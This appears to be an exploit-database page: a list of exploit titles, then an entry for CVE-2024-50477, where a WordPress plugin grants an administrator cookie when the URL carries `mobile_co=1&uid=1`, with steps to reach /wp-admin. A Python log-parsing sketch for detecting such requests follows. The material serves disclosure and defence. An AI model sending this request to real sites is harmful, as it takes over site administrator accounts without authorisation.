
9 changes to exploits/shellcodes/ghdb

Sudo 1.9.17 Host Option - Elevation of Privilege
Sudo chroot 1.9.17 - Local Privilege Escalation
Microsoft Defender for Endpoint (MDE) - Elevation of Privilege
ScriptCase 9.12.006 (23) - Remote Command Execution (RCE)
Discourse 3.2.x - Anonymous Cache Poisoning
Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover
Microsoft Outlook - Remote Code Execution (RCE)
Microsoft PowerPoint 2019 - Remote Code Execution (RCE)
# Exploit Title: Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover
# Date: October 25, 2024
# Exploit Author: stealthcopter
# Vendor Homepage: https://stacksmarket.co/
# Software Link: https://wordpress.org/plugins/stacks-mobile-app-builder/
# Version: <= 5.2.3
# Tested on: Ubuntu 24.10/Docker
# CVE: CVE-2024-50477
# References:
# - https://github.com/stealthcopter/wordpress-hacking/blob/main/reports/stacks-mobile-app-builder-priv-esc/stacks-mobile-app-builder-priv-esc.md
# - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stacks-mobile-app-builder/stacks-mobile-app-builder-523-authentication-bypass-via-account-takeover

1. Navigate to the target site and append the following query parameters to the URL to impersonate the user with ID `1`:

`/?mobile_co=1&uid=1`

2. You will now receive an authentication cookie for the specified user ID (typically, user ID `1` is the site administrator).

3. Visit `/wp-admin` — you should have full access to the admin dashboard.
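
For defenders, the request pattern in the steps above leaves a clear trace in web server access logs. The following Python detection sketch is an added example, not part of the original exploit entry: it assumes Combined Log Format, runs over constructed sample lines, and its function names (`parse_line`, `find_takeover_attempts`) are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format prefix: ip ident user [time] "METHOD target PROTO" status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3})')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Oct/2024:10:00:01 +0000] "GET /?mobile_co=1&uid=1 HTTP/1.1" 200 5120
203.0.113.7 - - [25/Oct/2024:10:00:05 +0000] "GET /wp-admin/ HTTP/1.1" 200 48211
198.51.100.4 - - [25/Oct/2024:10:01:00 +0000] "GET /?s=mobile_co HTTP/1.1" 200 900
198.51.100.4 - - [25/Oct/2024:10:01:09 +0000] "GET /wp-admin/ HTTP/1.1" 302 0
192.0.2.9 - - [25/Oct/2024:10:02:00 +0000] "GET /profile/?uid=1 HTTP/1.1" 200 700
"""

def parse_line(line):
    """Return (ip, time, path, query params, status) or None if unparseable."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, target, status = m.groups()
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    return ip, ts, parts.path, params, int(status)

def find_takeover_attempts(log_text):
    """Flag clients that sent both `mobile_co` and `uid` in one request."""
    hits = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, path, params, status = rec
        if "mobile_co" in params and "uid" in params:
            hit = hits.setdefault(ip, {"ip": ip, "first_seen": ts,
                                       "uids": set(), "admin_200_after": False})
            hit["uids"].update(params["uid"])
        elif ip in hits and path.startswith("/wp-admin") and status == 200:
            # Heuristic: unauthenticated /wp-admin normally redirects to login,
            # so a later 200 from the same client suggests the cookie was accepted.
            hits[ip]["admin_200_after"] = True
    return [dict(h, uids=sorted(h["uids"])) for h in hits.values()]

if __name__ == "__main__":
    for finding in find_takeover_attempts(SAMPLE_LOG):
        print(finding)
```

A finding with `admin_200_after` set is the higher-priority one to triage, since it pairs the trigger request with dashboard access from the same client.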